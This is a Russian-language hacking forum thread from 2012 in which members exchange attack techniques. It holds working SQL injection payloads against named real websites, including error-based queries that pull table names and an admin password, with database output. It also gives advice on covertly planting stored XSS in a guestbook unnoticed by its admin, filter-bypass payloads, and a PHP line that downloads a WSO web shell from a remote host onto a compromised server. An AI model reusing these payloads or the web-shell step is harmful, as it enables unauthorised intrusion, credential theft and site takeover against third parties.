Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Все + замени на /**/, а коммент на /*. Убери кавычку и т.д.
     
    #19021 Ereee, 13 Jan 2012
    Last edited: 13 Jan 2012
    1 person likes this.
  2. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    можно попытаться обойти авторизацию, с помощью or 1=1,но тут нужно смотреть на примере. и ещё - я на 90% уверен, что на сайте есть инъекция и в get запросе.
     
    2 people like this.
  3. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    почти прокатил :cool: теперь, ска на коммент маериться
    если без коммента, то
    Спасибо, подобрал :) .
     
    #19023 shadowrun, 13 Jan 2012
    Last edited: 13 Jan 2012
    2 people like this.
  4. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Бле, не даром пятн 13 :D
    Теперь, когда пытаюсь вывести login пишет следующую хрень:
     
  5. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    LIMIT юзай
     
    _________________________
  6. oODungVTOo

    oODungVTOo New Member

    Joined:
    3 Jun 2011
    Messages:
    85
    Likes Received:
    1
    Reputations:
    0
    HElp SQli

    http://www.adult-images.net/view_comments.php?gal=-455' /*!union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -
     
  7. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Code:
    http://www.adult-images.net/view_comments.php?gal=455'+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+1
    Ctrl+A
    Code:
    Duplicate entry 'COLLATIONS1' for key 'group_key'
     
    1 person likes this.
  8. NZT

    NZT New Member

    Joined:
    31 Dec 2011
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Скажите , меня интересует такой вопрос : пока я в гостевой ищю активную xss я вписываю разные вещи в поля чтобы найти xss, а редактировать свои сообщения нельзя , то даже когда я найду активную xss то админ гостевой зайдет и увидит кучу разных подозрительных сообщений которые я писал чтобы найти xss и прикроет дырку, и я не смогу этим ничего сделать. И даже пользователи что то заподозрят. Как можно искать активную xss незаметно чтобы обойтись только одним сообщением?(если нельзя редактировать) и чтобы никто ничего не заметил. Я вот это понять не могу. Заранее спасибо за ответ.
     
    #19028 NZT, 13 Jan 2012
    Last edited: 14 Jan 2012
  9. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Можно подробней?
     
  10. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    кол-во возвращаемых строк при подобном запросе должно быть не больше 1ого. скорее всего ты пытаешься вывести логин не используя лимит и база отдаёт бОльшее кол-во строк, вызывая ошибку.
    limit+0,1 при выводе логина, ты скорее всего упустил.
     
  11. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Нет. Все есть.
     
  12. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Code:
    admin'or+1+and(select+1+from(select+count(*),concat((select+password+from+cosm_users+where+login='admin'),floor(rand(0)*2))x+from+information_schema.table s+group+by+group+by+x)a)--+a
    Др. вариантов не вижу.
    --
    Помогите и мне! Как вывести таблицы:
    Code:
    http://www.ozerna[notforgoogle]ya42.ru/credit/form/LADA/Priora%204D/**/14'-9999.9+union+select+1,2,3,version(),5,6,7--+f
    "_" заменяет на пробел кажется или я что-то не так делаю?
     
  13. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Для начала написать любое сообщение и определить, где оно выводится на странице.
    1) Если вне HTML-тегов, достаточно проверить фильтрацию символа <.
    2) Текст выводится в параметре тега внутри кавычек. Надо проверить фильтрацию кавычки соответствующего типа. Экранирование кавычки допустимо, от XSS оно не защищает.
    2.1) Кавычка фильтруется, но параметр тега используется JS-кодом, в том числе обработчиками событий. Проверить &, #, ;.
    3) Внутри переменной JS. Проверить кавычку соответствующего типа. Экранирование кавычки не позволит выполнить XSS. Если кавычка фильтруется, проверить < и /
    3.1) Кавычка, < и/или / фильтруются, но содержимое выводится на страницу, например через document.write(). Достаточно проверки символа \

    Вставить один символ в сообщение, не вызвав подозрений, очень просто. Но делать это нужно так, чтобы сообщение не искажало вид страницы в случае наличия уязвимости.
     
  14. NZT

    NZT New Member

    Joined:
    31 Dec 2011
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    M_script большое тебе спасибо за отзыв, я его перечитал наверное раз 10 и я понял следущее но не уверен что я правильно все понял.
    1)Ты имеешь виду если собшение обычное без добавок html то надо написать <gsdgs>
    2)Если то что я написал в кавычках осталось в исходном коде то нашел xss , если заменилось то всеравно может быть xss , хоть в статье для новичков я читал что если кавычки заменились то это облом.
    2.1) если в исходном коде пусто то проверить символы &lt и &gt
    3)Потом в скрипте с алертом вместо <> вписать &lt , &gt , если скрипт напишется в сообщении значит есть xss , да он не выполняется но все же будут видеть то что я написал. И если вмето замененых кавычек появятся обычные значит пробовать вписать скрипт с обычными кавычками.
    3.1) Если в скрипте фильтруются < и / то проверить \ , но это я не понял потому что не знаю что мне дает символ \ , можешь расказать пожалуйста как его использовать. И если \ нет в исходном коде то это облом.

    Я вообще тебя правильно понял?
    И это же получается не одно сообщение или подругому никак?
    Спасибо.
     
    #19034 NZT, 14 Jan 2012
    Last edited: 14 Jan 2012
    1 person likes this.
  15. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Примеры:
    1)
    Символы (, ), = никто фильтровать не будет. Закрывать тег необязательно. Если проходит <, используем такой вариант:
    YWxlcnQoJ1hTUycp - alert('XSS') в base64.

    2)
    Даже если кавычка экранируется
    2.1)
    В зависимости от функции-обрабочика может вообще не потребоваться обход фильтров. Но если какая-либо фильтрация мешает, можно использовать хтмл-сущности символов.
    В myfunction() содержимое value передается как alert("test").

    3)
    Закрываем строку, вставляем свой код.
    Тег script можно закрыть даже внутри строки.
    3.1)
    Это лишь несколько общих примеров. Тема достаточно обширная и об этом можно написать еще много всего.


    Расположение текста в коде можно посмотреть по чужим текстам, если до тебя кто-то уже писал на странице.


    Ни разу не пробовал проходить DVWA
     
    #19035 M_script, 14 Jan 2012
    Last edited: 15 Jan 2012
    2 people like this.
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Еслить можно выполнять код + папки на запись, то какая проблема?
    PHP:
    copy("http://site.ltd/wso.txt","/home/www/123.php");
    P.S. В wp-config.php пасс хранится в открытом виде.
     
    1 person likes this.
  17. NZT

    NZT New Member

    Joined:
    31 Dec 2011
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    M_script спасибо, я не много что понял из твоего последнего сообщения но ты меня навел на мысль что может уже кто то использовал html-теги до меня как <div> и мне всего лишь надо заглянуть в source странички и проверить где возможна xss. Но , я тренируюсь в DVWA и там в уровне low проходит <script>alert()</script> , а вот в уровне medium не проходит и надо писать <sc<script>ript>alert()</sc</script>ript> но когда я это пишу чтобы проверить как мне вписать боевой скрипт мне выдает в коментарии ript> , это работает но появился подозрительный коментарий, можно ли этого как то избежать ? И скажи может ты знаешь , возможна ли в DVWA, xss на уровне high а то у меня ничего не получается ) А чтобы понять больше я думаю знания и опыт придут со временем, ведь я не собираюсь отступать )
    Ты за несколько сообщений уже многому меня научил чего я абсолютно не знал и не догадывался. Спасибо.
     
    #19037 NZT, 14 Jan 2012
    Last edited: 14 Jan 2012
  18. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Я уже писал выше, там нужно
    Code:
    <sc<script>ript>alert()</script>
    
    потому что вырезает только <script> а </script> не трогает.
    Именно в том случае xss нет. Но возможность обойти htmlspecialchars() есть только в том случае если уязвимый параметр выводится в ссылке и кодировка файла UTF-7.
     
  19. Bahamut

    Bahamut Banned

    Joined:
    7 Dec 2011
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    как залить файл если работает Put Method ?
     
  20. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Никак, если нет обработчика.
     
    1 person likes this.
Thread Status:
Not open for further replies.